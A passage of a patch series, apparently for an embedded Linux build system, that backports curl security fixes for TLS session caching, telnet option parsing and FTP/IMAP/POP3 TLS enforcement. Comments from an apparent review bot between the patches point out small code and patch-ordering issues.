+ struct ssl_connect_data *connssl = &conn->ssl[sockindex];
+ SECURITY_STATUS sspi_status = SEC_E_OK;
+ CERT_CONTEXT *ccert_context = NULL;
++ bool isproxy = SSL_IS_PROXY();
+ #ifdef DEBUGBUILD
+- const char * const hostname = SSL_IS_PROXY() ? conn->http_proxy.host.name :
++ const char * const hostname = isproxy ? conn->http_proxy.host.name :
+ conn->host.name;
+ #endif
+ #ifdef HAS_ALPN
+@@ -1268,7 +1270,7 @@ schannel_connect_step3(struct connectdata *conn, int sockindex)
+ struct curl_schannel_cred *old_cred = NULL;
+
+ Curl_ssl_sessionid_lock(conn);
+- incache = !(Curl_ssl_getsessionid(conn, (void **)&old_cred, NULL,
++ incache = !(Curl_ssl_getsessionid(conn, isproxy, (void **)&old_cred, NULL,
+ sockindex));
+ if(incache) {
+ if(old_cred != BACKEND->cred) {
+@@ -1280,7 +1282,7 @@ schannel_connect_step3(struct connectdata *conn, int sockindex)
+ }
+ }
+ if(!incache) {
+- result = Curl_ssl_addsessionid(conn, (void *)BACKEND->cred,
++ result = Curl_ssl_addsessionid(conn, isproxy, (void *)BACKEND->cred,
+ sizeof(struct curl_schannel_cred),
+ sockindex);
+ if(result) {
+diff --git a/lib/vtls/sectransp.c b/lib/vtls/sectransp.c
+index 7dd028fb7..9c67d465a 100644
+--- a/lib/vtls/sectransp.c
++++ b/lib/vtls/sectransp.c
+@@ -1376,7 +1376,8 @@ static CURLcode sectransp_connect_step1(struct connectdata *conn,
+ const char * const ssl_cafile = SSL_CONN_CONFIG(CAfile);
+ const bool verifypeer = SSL_CONN_CONFIG(verifypeer);
+ char * const ssl_cert = SSL_SET_OPTION(cert);
+- const char * const hostname = SSL_IS_PROXY() ? conn->http_proxy.host.name :
++ bool isproxy = SSL_IS_PROXY();
++ const char * const hostname = isproxy ? conn->http_proxy.host.name :
+ conn->host.name;
+ const long int port = SSL_IS_PROXY() ? conn->port : conn->remote_port;
+ #ifdef ENABLE_IPV6
+@@ -1584,7 +1585,7 @@ static CURLcode sectransp_connect_step1(struct connectdata *conn,
+
+ #ifdef USE_NGHTTP2
+ if(data->set.httpversion >= CURL_HTTP_VERSION_2 &&
+- (!SSL_IS_PROXY() || !conn->bits.tunnel_proxy)) {
++ (!isproxy || !conn->bits.tunnel_proxy)) {
+ CFArrayAppendValue(alpnArr, CFSTR(NGHTTP2_PROTO_VERSION_ID));
+ infof(data, "ALPN, offering %s\n", NGHTTP2_PROTO_VERSION_ID);
+ }
+@@ -1916,7 +1917,7 @@ static CURLcode sectransp_connect_step1(struct connectdata *conn,
+ size_t ssl_sessionid_len;
+
+ Curl_ssl_sessionid_lock(conn);
+- if(!Curl_ssl_getsessionid(conn, (void **)&ssl_sessionid,
++ if(!Curl_ssl_getsessionid(conn, isproxy, (void **)&ssl_sessionid,
+ &ssl_sessionid_len, sockindex)) {
+ /* we got a session id, use it! */
+ err = SSLSetPeerID(BACKEND->ssl_ctx, ssl_sessionid, ssl_sessionid_len);
+@@ -1944,7 +1945,7 @@ static CURLcode sectransp_connect_step1(struct connectdata *conn,
+ return CURLE_SSL_CONNECT_ERROR;
+ }
+
+- result = Curl_ssl_addsessionid(conn, ssl_sessionid, ssl_sessionid_len,
++ result = Curl_ssl_addsessionid(conn, isproxy, ssl_sessionid, ssl_sessionid_len,
+ sockindex);
+ Curl_ssl_sessionid_unlock(conn);
+ if(result) {
+diff --git a/lib/vtls/vtls.c b/lib/vtls/vtls.c
+index dfefa1bd5..aaf73ef8f 100644
+--- a/lib/vtls/vtls.c
++++ b/lib/vtls/vtls.c
+@@ -305,6 +305,7 @@ void Curl_ssl_sessionid_unlock(struct connectdata *conn)
+ * there's one suitable, it is provided. Returns TRUE when no entry matched.
+ */
+ bool Curl_ssl_getsessionid(struct connectdata *conn,
++ const bool isProxy,
+ void **ssl_sessionid,
+ size_t *idsize, /* set 0 if unknown */
+ int sockindex)
+@@ -315,7 +316,6 @@ bool Curl_ssl_getsessionid(struct connectdata *conn,
+ long *general_age;
+ bool no_match = TRUE;
+
+- const bool isProxy = CONNECT_PROXY_SSL();
+ struct ssl_primary_config * const ssl_config = isProxy ?
+ &conn->proxy_ssl_config :
+ &conn->ssl_config;
+@@ -324,6 +324,11 @@ bool Curl_ssl_getsessionid(struct connectdata *conn,
+ int port = isProxy ? (int)conn->port : conn->remote_port;
+ *ssl_sessionid = NULL;
+
++#ifdef CURL_DISABLE_PROXY
++ if(isProxy)
++ return TRUE;
++#endif
++
+ DEBUGASSERT(SSL_SET_OPTION(primary.sessionid));
+
+ if(!SSL_SET_OPTION(primary.sessionid))
+@@ -411,6 +416,7 @@ void Curl_ssl_delsessionid(struct connectdata *conn, void *ssl_sessionid)
+ * later on.
+ */
+ CURLcode Curl_ssl_addsessionid(struct connectdata *conn,
++ bool isProxy,
+ void *ssl_sessionid,
+ size_t idsize,
+ int sockindex)
+@@ -423,7 +429,6 @@ CURLcode Curl_ssl_addsessionid(struct connectdata *conn,
+ char *clone_conn_to_host;
+ int conn_to_port;
+ long *general_age;
+- const bool isProxy = CONNECT_PROXY_SSL();
+ struct ssl_primary_config * const ssl_config = isProxy ?
+ &conn->proxy_ssl_config :
+ &conn->ssl_config;
+diff --git a/lib/vtls/vtls.h b/lib/vtls/vtls.h
+index a81b2f22d..a5e348752 100644
+--- a/lib/vtls/vtls.h
++++ b/lib/vtls/vtls.h
+@@ -202,6 +202,7 @@ void Curl_ssl_sessionid_unlock(struct connectdata *conn);
+ * under sessionid mutex).
+ */
+ bool Curl_ssl_getsessionid(struct connectdata *conn,
++ const bool isproxy,
+ void **ssl_sessionid,
+ size_t *idsize, /* set 0 if unknown */
+ int sockindex);
+@@ -211,6 +212,7 @@ bool Curl_ssl_getsessionid(struct connectdata *conn,
+ * object with cache (e.g. incrementing refcount on success)
+ */
+ CURLcode Curl_ssl_addsessionid(struct connectdata *conn,
++ const bool isProxy,
+ void *ssl_sessionid,
+ size_t idsize,
+ int sockindex);
+diff --git a/lib/vtls/wolfssl.c b/lib/vtls/wolfssl.c
+index 8c2d3f4a2..dd9f907ff 100644
+--- a/lib/vtls/wolfssl.c
++++ b/lib/vtls/wolfssl.c
+@@ -392,7 +392,8 @@ wolfssl_connect_step1(struct connectdata *conn,
+ void *ssl_sessionid = NULL;
+
+ Curl_ssl_sessionid_lock(conn);
+- if(!Curl_ssl_getsessionid(conn, &ssl_sessionid, NULL, sockindex)) {
++ if(!Curl_ssl_getsessionid(conn, SSL_IS_PROXY() ? TRUE : FALSE,
++ &ssl_sessionid, NULL, sockindex)) {
+ /* we got a session id, use it! */
+ if(!SSL_set_session(BACKEND->handle, ssl_sessionid)) {
+ char error_buffer[WOLFSSL_MAX_ERROR_SZ];
+@@ -618,9 +619,10 @@ wolfssl_connect_step3(struct connectdata *conn,
+ void *old_ssl_sessionid = NULL;
+
+ our_ssl_sessionid = SSL_get_session(BACKEND->handle);
++ bool isproxy = SSL_IS_PROXY() ? TRUE : FALSE;
+
+ Curl_ssl_sessionid_lock(conn);
+- incache = !(Curl_ssl_getsessionid(conn, &old_ssl_sessionid, NULL,
++ incache = !(Curl_ssl_getsessionid(conn, isproxy, &old_ssl_sessionid, NULL,
+ sockindex));
+ if(incache) {
+ if(old_ssl_sessionid != our_ssl_sessionid) {
+@@ -631,7 +633,7 @@ wolfssl_connect_step3(struct connectdata *conn,
+ }
+
+ if(!incache) {
+- result = Curl_ssl_addsessionid(conn, our_ssl_sessionid,
++ result = Curl_ssl_addsessionid(conn, isproxy, our_ssl_sessionid,
+ 0 /* unknown size */, sockindex);
+ if(result) {
+ Curl_ssl_sessionid_unlock(conn);
+--
+2.20.1
+
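Review bot: In the `lib/vtls/mesalink.c` part, `mesalink_connect_step3()` declares `bool inproxy = SSL_IS_PROXY() ? TRUE : FALSE;` but then passes `isproxy` to `Curl_ssl_getsessionid()` and `Curl_ssl_addsessionid()`. That backend would not compile if it were enabled, and the declaration should read `bool isproxy = SSL_IS_PROXY() ? TRUE : FALSE;`. In `lib/vtls/wolfssl.c`, `bool isproxy = ...` is added after the statement `our_ssl_sessionid = SSL_get_session(BACKEND->handle);`. This is a declaration after a statement and belongs with the other locals at the top of `wolfssl_connect_step3()`. The `Curl_ssl_addsessionid()` prototype in `vtls.h` takes `const bool isProxy` while the definition in `vtls.c` takes `bool isProxy`, which is harmless but should be made to agree. The function bodies continue outside the inner hunks.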
diff --git a/meta/recipes-support/curl/curl/CVE-2021-22898.patch b/meta/recipes-support/curl/curl/CVE-2021-22898.patch
new file mode 100644
index 0000000000..0800e10175
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2021-22898.patch
@@ -0,0 +1,26 @@
+From 39ce47f219b09c380b81f89fe54ac586c8db6bde Mon Sep 17 00:00:00 2001
+From: Harry Sintonen <sintonen@iki.fi>
+Date: Fri, 7 May 2021 13:09:57 +0200
+Subject: [PATCH] telnet: check sscanf() for correct number of matches
+
+CVE: CVE-2021-22898
+Upstream-Status: Backport
+Link: https://github.com/curl/curl/commit/39ce47f219b09c380b81f89fe54ac586c8db6bde
+Bug: https://curl.se/docs/CVE-2021-22898.html
+---
+ lib/telnet.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/lib/telnet.c b/lib/telnet.c
+index 26e0658ba9cc..fdd137fb0c04 100644
+--- a/lib/telnet.c
++++ b/lib/telnet.c
+@@ -922,7 +922,7 @@ static void suboption(struct Curl_easy *data)
+ size_t tmplen = (strlen(v->data) + 1);
+ /* Add the variable only if it fits */
+ if(len + tmplen < (int)sizeof(temp)-6) {
+- if(sscanf(v->data, "%127[^,],%127s", varname, varval)) {
++ if(sscanf(v->data, "%127[^,],%127s", varname, varval) == 2) {
+ msnprintf((char *)&temp[len], sizeof(temp) - len,
+ "%c%s%c%s", CURL_NEW_ENV_VAR, varname,
+ CURL_NEW_ENV_VALUE, varval);
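Review bot: The header of this patch should say that it is only the first half of the `suboption()` fix. CVE-2021-22925.patch, added on this page, removes exactly the line added here, `if(sscanf(v->data, "%127[^,],%127s", varname, varval) == 2) {`, and rewrites the length accounting that follows it. That patch therefore only applies after this one, and this one alone does not bound what is sent to what `msnprintf()` actually wrote. A header line such as `Note: superseded in part by CVE-2021-22925.patch; apply both, in this order` would keep a later cleanup from dropping one of them. The hunk context names `suboption(struct Curl_easy *data)`, whereas the CVE-2021-22925 patch shows `suboption(struct connectdata *conn)`. The patch was presumably taken from a newer upstream tree and applies here with an offset, so it is worth confirming that it applies without fuzz.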
diff --git a/meta/recipes-support/curl/curl/CVE-2021-22924.patch b/meta/recipes-support/curl/curl/CVE-2021-22924.patch
new file mode 100644
index 0000000000..68fde45ddf
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2021-22924.patch
@@ -0,0 +1,226 @@
+Subject: [PATCH] vtls: fix connection reuse checks for issuer cert and
+ case sensitivity CVE-2021-22924
+
+Reported-by: Harry Sintonen
+Bug: https://curl.se/docs/CVE-2021-22924.html
+CVE: CVE-2021-22924
+Upstream-Status: backport from Ubuntu curl_7.68.0-1ubuntu2.6
+Signed-off-by: Mike Crowe <mac@mcrowe.com>
+---
+ lib/url.c | 5 +++--
+ lib/urldata.h | 2 +-
+ lib/vtls/gtls.c | 10 +++++-----
+ lib/vtls/nss.c | 4 ++--
+ lib/vtls/openssl.c | 12 ++++++------
+ lib/vtls/vtls.c | 23 ++++++++++++++++++-----
+ 6 files changed, 35 insertions(+), 21 deletions(-)
+
+diff --git a/lib/url.c b/lib/url.c
+index 47fc66aed..eebad8d32 100644
+--- a/lib/url.c
++++ b/lib/url.c
+@@ -3555,6 +3555,9 @@ static CURLcode create_conn(struct Curl_easy *data,
+ data->set.proxy_ssl.primary.CApath = data->set.str[STRING_SSL_CAPATH_PROXY];
+ data->set.ssl.primary.CAfile = data->set.str[STRING_SSL_CAFILE_ORIG];
+ data->set.proxy_ssl.primary.CAfile = data->set.str[STRING_SSL_CAFILE_PROXY];
++ data->set.ssl.primary.issuercert = data->set.str[STRING_SSL_ISSUERCERT_ORIG];
++ data->set.proxy_ssl.primary.issuercert =
++ data->set.str[STRING_SSL_ISSUERCERT_PROXY];
+ data->set.ssl.primary.random_file = data->set.str[STRING_SSL_RANDOM_FILE];
+ data->set.proxy_ssl.primary.random_file =
+ data->set.str[STRING_SSL_RANDOM_FILE];
+@@ -3575,8 +3578,6 @@ static CURLcode create_conn(struct Curl_easy *data,
+
+ data->set.ssl.CRLfile = data->set.str[STRING_SSL_CRLFILE_ORIG];
+ data->set.proxy_ssl.CRLfile = data->set.str[STRING_SSL_CRLFILE_PROXY];
+- data->set.ssl.issuercert = data->set.str[STRING_SSL_ISSUERCERT_ORIG];
+- data->set.proxy_ssl.issuercert = data->set.str[STRING_SSL_ISSUERCERT_PROXY];
+ data->set.ssl.cert = data->set.str[STRING_CERT_ORIG];
+ data->set.proxy_ssl.cert = data->set.str[STRING_CERT_PROXY];
+ data->set.ssl.cert_type = data->set.str[STRING_CERT_TYPE_ORIG];
+diff --git a/lib/urldata.h b/lib/urldata.h
+index fbb8b645e..615fbf369 100644
+--- a/lib/urldata.h
++++ b/lib/urldata.h
+@@ -224,6 +224,7 @@ struct ssl_primary_config {
+ long version_max; /* max supported version the client wants to use*/
+ char *CApath; /* certificate dir (doesn't work on windows) */
+ char *CAfile; /* certificate to verify peer against */
++ char *issuercert; /* optional issuer certificate filename */
+ char *clientcert;
+ char *random_file; /* path to file containing "random" data */
+ char *egdsocket; /* path to file containing the EGD daemon socket */
+@@ -240,7 +241,6 @@ struct ssl_config_data {
+ struct ssl_primary_config primary;
+ long certverifyresult; /* result from the certificate verification */
+ char *CRLfile; /* CRL to check certificate revocation */
+- char *issuercert;/* optional issuer certificate filename */
+ curl_ssl_ctx_callback fsslctx; /* function to initialize ssl ctx */
+ void *fsslctxp; /* parameter for call back */
+ char *cert; /* client certificate file name */
+diff --git a/lib/vtls/gtls.c b/lib/vtls/gtls.c
+index 46e149c7d..8c051024f 100644
+--- a/lib/vtls/gtls.c
++++ b/lib/vtls/gtls.c
+@@ -1059,7 +1059,7 @@ gtls_connect_step3(struct connectdata *conn,
+ if(!chainp) {
+ if(SSL_CONN_CONFIG(verifypeer) ||
+ SSL_CONN_CONFIG(verifyhost) ||
+- SSL_SET_OPTION(issuercert)) {
++ SSL_CONN_CONFIG(issuercert)) {
+ #ifdef USE_TLS_SRP
+ if(SSL_SET_OPTION(authtype) == CURL_TLSAUTH_SRP
+ && SSL_SET_OPTION(username) != NULL
+@@ -1241,21 +1241,21 @@ gtls_connect_step3(struct connectdata *conn,
+ gnutls_x509_crt_t format */
+ gnutls_x509_crt_import(x509_cert, chainp, GNUTLS_X509_FMT_DER);
+
+- if(SSL_SET_OPTION(issuercert)) {
++ if(SSL_CONN_CONFIG(issuercert)) {
+ gnutls_x509_crt_init(&x509_issuer);
+- issuerp = load_file(SSL_SET_OPTION(issuercert));
++ issuerp = load_file(SSL_CONN_CONFIG(issuercert));
+ gnutls_x509_crt_import(x509_issuer, &issuerp, GNUTLS_X509_FMT_PEM);
+ rc = gnutls_x509_crt_check_issuer(x509_cert, x509_issuer);
+ gnutls_x509_crt_deinit(x509_issuer);
+ unload_file(issuerp);
+ if(rc <= 0) {
+ failf(data, "server certificate issuer check failed (IssuerCert: %s)",
+- SSL_SET_OPTION(issuercert)?SSL_SET_OPTION(issuercert):"none");
++ SSL_CONN_CONFIG(issuercert)?SSL_CONN_CONFIG(issuercert):"none");
+ gnutls_x509_crt_deinit(x509_cert);
+ return CURLE_SSL_ISSUER_ERROR;
+ }
+ infof(data, "\t server certificate issuer check OK (Issuer Cert: %s)\n",
+- SSL_SET_OPTION(issuercert)?SSL_SET_OPTION(issuercert):"none");
++ SSL_CONN_CONFIG(issuercert)?SSL_CONN_CONFIG(issuercert):"none");
+ }
+
+ size = sizeof(certbuf);
+diff --git a/lib/vtls/nss.c b/lib/vtls/nss.c
+index ef51b0d91..375c78b1b 100644
+--- a/lib/vtls/nss.c
++++ b/lib/vtls/nss.c
+@@ -2151,9 +2151,9 @@ static CURLcode nss_do_connect(struct connectdata *conn, int sockindex)
+ if(result)
+ goto error;
+
+- if(SSL_SET_OPTION(issuercert)) {
++ if(SSL_CONN_CONFIG(issuercert)) {
+ SECStatus ret = SECFailure;
+- char *nickname = dup_nickname(data, SSL_SET_OPTION(issuercert));
++ char *nickname = dup_nickname(data, SSL_CONN_CONFIG(issuercert));
+ if(nickname) {
+ /* we support only nicknames in case of issuercert for now */
+ ret = check_issuer_cert(BACKEND->handle, nickname);
+diff --git a/lib/vtls/openssl.c b/lib/vtls/openssl.c
+index 64f43605a..7e81fd3a0 100644
+--- a/lib/vtls/openssl.c
++++ b/lib/vtls/openssl.c
+@@ -3547,7 +3547,7 @@ static CURLcode servercert(struct connectdata *conn,
+ deallocating the certificate. */
+
+ /* e.g. match issuer name with provided issuer certificate */
+- if(SSL_SET_OPTION(issuercert)) {
++ if(SSL_CONN_CONFIG(issuercert)) {
+ fp = BIO_new(BIO_s_file());
+ if(fp == NULL) {
+ failf(data,
+@@ -3560,10 +3560,10 @@ static CURLcode servercert(struct connectdata *conn,
+ return CURLE_OUT_OF_MEMORY;
+ }
+
+- if(BIO_read_filename(fp, SSL_SET_OPTION(issuercert)) <= 0) {
++ if(BIO_read_filename(fp, SSL_CONN_CONFIG(issuercert)) <= 0) {
+ if(strict)
+ failf(data, "SSL: Unable to open issuer cert (%s)",
+- SSL_SET_OPTION(issuercert));
++ SSL_CONN_CONFIG(issuercert));
+ BIO_free(fp);
+ X509_free(BACKEND->server_cert);
+ BACKEND->server_cert = NULL;
+@@ -3574,7 +3574,7 @@ static CURLcode servercert(struct connectdata *conn,
+ if(!issuer) {
+ if(strict)
+ failf(data, "SSL: Unable to read issuer cert (%s)",
+- SSL_SET_OPTION(issuercert));
++ SSL_CONN_CONFIG(issuercert));
+ BIO_free(fp);
+ X509_free(issuer);
+ X509_free(BACKEND->server_cert);
+@@ -3585,7 +3585,7 @@ static CURLcode servercert(struct connectdata *conn,
+ if(X509_check_issued(issuer, BACKEND->server_cert) != X509_V_OK) {
+ if(strict)
+ failf(data, "SSL: Certificate issuer check failed (%s)",
+- SSL_SET_OPTION(issuercert));
++ SSL_CONN_CONFIG(issuercert));
+ BIO_free(fp);
+ X509_free(issuer);
+ X509_free(BACKEND->server_cert);
+@@ -3594,7 +3594,7 @@ static CURLcode servercert(struct connectdata *conn,
+ }
+
+ infof(data, " SSL certificate issuer check ok (%s)\n",
+- SSL_SET_OPTION(issuercert));
++ SSL_CONN_CONFIG(issuercert));
+ BIO_free(fp);
+ X509_free(issuer);
+ }
+diff --git a/lib/vtls/vtls.c b/lib/vtls/vtls.c
+index aaf73ef8f..8c681da14 100644
+--- a/lib/vtls/vtls.c
++++ b/lib/vtls/vtls.c
+@@ -82,6 +82,16 @@
+ else \
+ dest->var = NULL;
+
++static bool safecmp(char *a, char *b)
++{
++ if(a && b)
++ return !strcmp(a, b);
++ else if(!a && !b)
++ return TRUE; /* match */
++ return FALSE; /* no match */
++}
++
++
+ bool
+ Curl_ssl_config_matches(struct ssl_primary_config* data,
+ struct ssl_primary_config* needle)
+@@ -91,11 +101,12 @@ Curl_ssl_config_matches(struct ssl_primary_config* data,
+ (data->verifypeer == needle->verifypeer) &&
+ (data->verifyhost == needle->verifyhost) &&
+ (data->verifystatus == needle->verifystatus) &&
+- Curl_safe_strcasecompare(data->CApath, needle->CApath) &&
+- Curl_safe_strcasecompare(data->CAfile, needle->CAfile) &&
+- Curl_safe_strcasecompare(data->clientcert, needle->clientcert) &&
+- Curl_safe_strcasecompare(data->random_file, needle->random_file) &&
+- Curl_safe_strcasecompare(data->egdsocket, needle->egdsocket) &&
++ safecmp(data->CApath, needle->CApath) &&
++ safecmp(data->CAfile, needle->CAfile) &&
++ safecmp(data->issuercert, needle->issuercert) &&
++ safecmp(data->clientcert, needle->clientcert) &&
++ safecmp(data->random_file, needle->random_file) &&
++ safecmp(data->egdsocket, needle->egdsocket) &&
+ Curl_safe_strcasecompare(data->cipher_list, needle->cipher_list) &&
+ Curl_safe_strcasecompare(data->cipher_list13, needle->cipher_list13) &&
+ Curl_safe_strcasecompare(data->pinned_key, needle->pinned_key))
+@@ -117,6 +128,7 @@ Curl_clone_primary_ssl_config(struct ssl_primary_config *source,
+
+ CLONE_STRING(CApath);
+ CLONE_STRING(CAfile);
++ CLONE_STRING(issuercert);
+ CLONE_STRING(clientcert);
+ CLONE_STRING(random_file);
+ CLONE_STRING(egdsocket);
+@@ -131,6 +143,7 @@ void Curl_free_primary_ssl_config(struct ssl_primary_config* sslc)
+ {
+ Curl_safefree(sslc->CApath);
+ Curl_safefree(sslc->CAfile);
++ Curl_safefree(sslc->issuercert);
+ Curl_safefree(sslc->clientcert);
+ Curl_safefree(sslc->random_file);
+ Curl_safefree(sslc->egdsocket);
+--
+2.30.2
+
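Review bot: `Curl_ssl_config_matches()` moves the file-name fields to the case-sensitive `safecmp()` but still compares `pinned_key` with `Curl_safe_strcasecompare(data->pinned_key, needle->pinned_key)`. If that field holds a file name or a base64 hash, as the pinned public key option allows, two configurations whose pins differ only in letter case would be treated as equal for connection reuse. That is the same class of mismatch this patch fixes for `CApath` and `CAfile`. The line should become `safecmp(data->pinned_key, needle->pinned_key))`. `CRLfile` stays in `struct ssl_config_data` and so is not part of this comparison at all, which is worth checking against later upstream fixes. `safecmp()` could also take `const char *` arguments since it only reads them.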
diff --git a/meta/recipes-support/curl/curl/CVE-2021-22925.patch b/meta/recipes-support/curl/curl/CVE-2021-22925.patch
new file mode 100644
index 0000000000..13b55f76be
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2021-22925.patch
@@ -0,0 +1,43 @@
+Subject: [PATCH] telnet: fix option parser to not send uninitialized
+ contents CVE-2021-22925
+
+Reported-by: Red Hat Product Security
+Bug: https://curl.se/docs/CVE-2021-22925.html
+CVE: CVE-2021-22925
+Upstream-Status: backport from Ubuntu curl_7.68.0-1ubuntu2.6
+Signed-off-by: Mike Crowe <mac@mcrowe.com>
+---
+ lib/telnet.c | 17 +++++++++++------
+ 1 file changed, 11 insertions(+), 6 deletions(-)
+
+diff --git a/lib/telnet.c b/lib/telnet.c
+index 4bf4c652c..3347ad6d1 100644
+--- a/lib/telnet.c
++++ b/lib/telnet.c
+@@ -967,12 +967,17 @@ static void suboption(struct connectdata *conn)
+ size_t tmplen = (strlen(v->data) + 1);
+ /* Add the variable only if it fits */
+ if(len + tmplen < (int)sizeof(temp)-6) {
+- if(sscanf(v->data, "%127[^,],%127s", varname, varval) == 2) {
+- msnprintf((char *)&temp[len], sizeof(temp) - len,
+- "%c%s%c%s", CURL_NEW_ENV_VAR, varname,
+- CURL_NEW_ENV_VALUE, varval);
+- len += tmplen;
+- }
++ int rv;
++ char sep[2] = "";
++ varval[0] = 0;
++ rv = sscanf(v->data, "%127[^,]%1[,]%127s", varname, sep, varval);
++ if(rv == 1)
++ len += msnprintf((char *)&temp[len], sizeof(temp) - len,
++ "%c%s", CURL_NEW_ENV_VAR, varname);
++ else if(rv >= 2)
++ len += msnprintf((char *)&temp[len], sizeof(temp) - len,
++ "%c%s%c%s", CURL_NEW_ENV_VAR, varname,
++ CURL_NEW_ENV_VALUE, varval);
+ }
+ }
+ msnprintf((char *)&temp[len], sizeof(temp) - len,
+--
+2.30.2
+
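Review bot: The `else if(rv >= 2)` branch added to suboption() has no comment saying what `rv == 2` means, and that case is the reason `varval[0] = 0;` was added. With the new format string, `rv == 2` is a `NAME,` entry whose value is missing, so `varval` holds only the terminator written just above and an empty value is sent. I would add `/* rv == 2: "NAME," with no value; varval was zeroed above, so an empty value is sent */` above that branch. The header would also be easier to audit if it followed the form the later patches in this series use, `Upstream-Status: Backport [<upstream-commit-url>]`. suboption()'s body starts and ends outside the inner hunk.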
diff --git a/meta/recipes-support/curl/curl/CVE-2021-22946-pre1.patch b/meta/recipes-support/curl/curl/CVE-2021-22946-pre1.patch
new file mode 100644
index 0000000000..4afd755149
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2021-22946-pre1.patch
@@ -0,0 +1,86 @@
+Backport of:
+
+From 1397a7de6e312e019a3b339f855ba0a5cafa9127 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Mon, 21 Sep 2020 09:15:51 +0200
+Subject: [PATCH] ftp: separate FTPS from FTP over "HTTPS proxy"
+
+When using HTTPS proxy, SSL is used but not in the view of the FTP
+protocol handler itself so separate the connection's use of SSL from the
+FTP control connection's sue.
+
+Reported-by: Mingtao Yang
+Fixes #5523
+Closes #6006
+
+Upstream-Status: backport from 7.68.0-1ubuntu2.7
+Signed-off-by: Mike Crowe <mac@mcrowe.com>
+---
+ lib/ftp.c | 13 ++++++-------
+ lib/urldata.h | 1 +
+ 2 files changed, 7 insertions(+), 7 deletions(-)
+
+diff --git a/lib/ftp.c b/lib/ftp.c
+index 3382772..677527f 100644
+--- a/lib/ftp.c
++++ b/lib/ftp.c
+@@ -2488,7 +2488,7 @@ static CURLcode ftp_state_loggedin(struct connectdata *conn)
+ {
+ CURLcode result = CURLE_OK;
+
+- if(conn->ssl[FIRSTSOCKET].use) {
++ if(conn->bits.ftp_use_control_ssl) {
+ /* PBSZ = PROTECTION BUFFER SIZE.
+
+ The 'draft-murray-auth-ftp-ssl' (draft 12, page 7) says:
+@@ -2633,11 +2633,8 @@ static CURLcode ftp_statemach_act(struct connectdata *conn)
+ }
+ #endif
+
+- if(data->set.use_ssl &&
+- (!conn->ssl[FIRSTSOCKET].use ||
+- (conn->bits.proxy_ssl_connected[FIRSTSOCKET] &&
+- !conn->proxy_ssl[FIRSTSOCKET].use))) {
+- /* We don't have a SSL/TLS connection yet, but FTPS is
++ if(data->set.use_ssl && !conn->bits.ftp_use_control_ssl) {
++ /* We don't have a SSL/TLS control connection yet, but FTPS is
+ requested. Try a FTPS connection now */
+
+ ftpc->count3 = 0;
+@@ -2682,6 +2679,7 @@ static CURLcode ftp_statemach_act(struct connectdata *conn)
+ result = Curl_ssl_connect(conn, FIRSTSOCKET);
+ if(!result) {
+ conn->bits.ftp_use_data_ssl = FALSE; /* clear-text data */
++ conn->bits.ftp_use_control_ssl = TRUE; /* SSL on control */
+ result = ftp_state_user(conn);
+ }
+ }
+@@ -3072,7 +3070,7 @@ static CURLcode ftp_block_statemach(struct connectdata *conn)
+ *
+ */
+ static CURLcode ftp_connect(struct connectdata *conn,
+- bool *done) /* see description above */
++ bool *done) /* see description above */
+ {
+ CURLcode result;
+ struct ftp_conn *ftpc = &conn->proto.ftpc;
+@@ -3093,6 +3091,7 @@ static CURLcode ftp_connect(struct connectdata *conn,
+ result = Curl_ssl_connect(conn, FIRSTSOCKET);
+ if(result)
+ return result;
++ conn->bits.ftp_use_control_ssl = TRUE;
+ }
+
+ Curl_pp_init(pp); /* init the generic pingpong data */
+diff --git a/lib/urldata.h b/lib/urldata.h
+index ff2d686..d1fb4a9 100644
+--- a/lib/urldata.h
++++ b/lib/urldata.h
+@@ -461,6 +461,7 @@ struct ConnectBits {
+ EPRT doesn't work we disable it for the forthcoming
+ requests */
+ BIT(ftp_use_data_ssl); /* Enabled SSL for the data connection */
++ BIT(ftp_use_control_ssl); /* Enabled SSL for the control connection */
+ #endif
+ BIT(netrc); /* name+password provided by netrc */
+ BIT(userpwd_in_url); /* name+password found in url */
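Review bot: The comment on the new `ftp_use_control_ssl` bit in lib/urldata.h, "Enabled SSL for the control connection", does not say how it differs from `conn->ssl[FIRSTSOCKET].use`, which is the distinction this patch exists to make. From the hunks, the bit is set only after a successful `Curl_ssl_connect(conn, FIRSTSOCKET)` in ftp_connect() and ftp_statemach_act(), and the commit message says TLS to an HTTPS proxy must not count. I would word the comment as `/* TLS is active on the FTP control channel itself; TLS to an HTTPS proxy does not set this */`. None of the visible hunks clear the bit again, so it is worth confirming that it starts out as zero for every new connection.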
diff --git a/meta/recipes-support/curl/curl/CVE-2021-22946.patch b/meta/recipes-support/curl/curl/CVE-2021-22946.patch
new file mode 100644
index 0000000000..98032d8b78
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2021-22946.patch
@@ -0,0 +1,328 @@
+Backport of:
+
+From 96d71feb27e533a8b337512841a537952916262c Mon Sep 17 00:00:00 2001
+From: Patrick Monnerat <patrick@monnerat.net>
+Date: Wed, 8 Sep 2021 11:56:22 +0200
+Subject: [PATCH] ftp,imap,pop3: do not ignore --ssl-reqd
+
+In imap and pop3, check if TLS is required even when capabilities
+request has failed.
+
+In ftp, ignore preauthentication (230 status of server greeting) if TLS
+is required.
+
+Bug: https://curl.se/docs/CVE-2021-22946.html
+Upstream-Status: backport from 7.68.0-1ubuntu2.7
+Signed-off-by: Mike Crowe <mac@mcrowe.com>
+CVE: CVE-2021-22946
+---
+ lib/ftp.c | 9 ++++---
+ lib/imap.c | 24 ++++++++----------
+ lib/pop3.c | 33 +++++++++++-------------
+ tests/data/Makefile.inc | 2 ++
+ tests/data/test984 | 56 +++++++++++++++++++++++++++++++++++++++++
+ tests/data/test985 | 54 +++++++++++++++++++++++++++++++++++++++
+ tests/data/test986 | 53 ++++++++++++++++++++++++++++++++++++++
+ 7 files changed, 195 insertions(+), 36 deletions(-)
+ create mode 100644 tests/data/test984
+ create mode 100644 tests/data/test985
+ create mode 100644 tests/data/test986
+
+diff --git a/lib/ftp.c b/lib/ftp.c
+index 677527f..91b43d8 100644
+--- a/lib/ftp.c
++++ b/lib/ftp.c
+@@ -2606,9 +2606,12 @@ static CURLcode ftp_statemach_act(struct connectdata *conn)
+ /* we have now received a full FTP server response */
+ switch(ftpc->state) {
+ case FTP_WAIT220:
+- if(ftpcode == 230)
+- /* 230 User logged in - already! */
